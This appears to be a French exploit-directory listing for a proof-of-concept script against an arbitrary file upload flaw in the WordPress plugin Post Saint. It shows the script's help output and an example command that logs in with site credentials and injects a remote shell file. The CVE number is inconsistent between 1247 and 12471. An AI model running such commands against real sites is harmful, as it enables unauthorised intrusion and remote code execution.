Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/nxploited/cve-2024-1247-poc
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-1247-poc

CVE-2024-1247-PoC

Post Saint <= 1.3.1 plugin pour WordPress – Téléchargement de fichier arbitraire

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-1247-PoC

Plugin Post Saint <= 1.3.1 pour WordPress – Téléchargement arbitraire de fichiers

Description

Le plugin Post Saint pour WordPress (versions jusqu’à 1.3.1 inclus) est vulnérable aux téléchargements arbitraires de fichiers en raison de l’absence de vérifications des capacités et de validation du type de fichiers. Les attaquants authentifiés disposant d’au moins un accès de niveau abonné peuvent exploiter cette vulnérabilité pour téléverser des fichiers arbitraires, ce qui peut potentiellement conduire à l’exécution de code à distance.

Fonctionnalités

  • Détecte les versions vulnérables du plugin.
  • Se connecte à WordPress à l’aide des identifiants fournis.
  • Exploite la vulnérabilité pour téléverser des fichiers arbitraires.

Utilisation

Prérequis

  1. Installez Python 3.8 ou une version ultérieure.
  2. Installez les bibliothèques requises :
root@kitploit:~
  
pip install requests packaging urllib3

Utilisation -help

root@kitploit:~

 CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of theWordPress site
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -ru REMOTE_URL, --remote_url REMOTE_URL
                        Remote URL of the shell file to inject

Exemple :

root@kitploit:~
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>

Avertissement

Ce script est uniquement destiné à des fins éducatives et de recherche. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n’avez pas d’autorisation explicite de tester est illégale et contraire à l’éthique.

Télécharger l’outil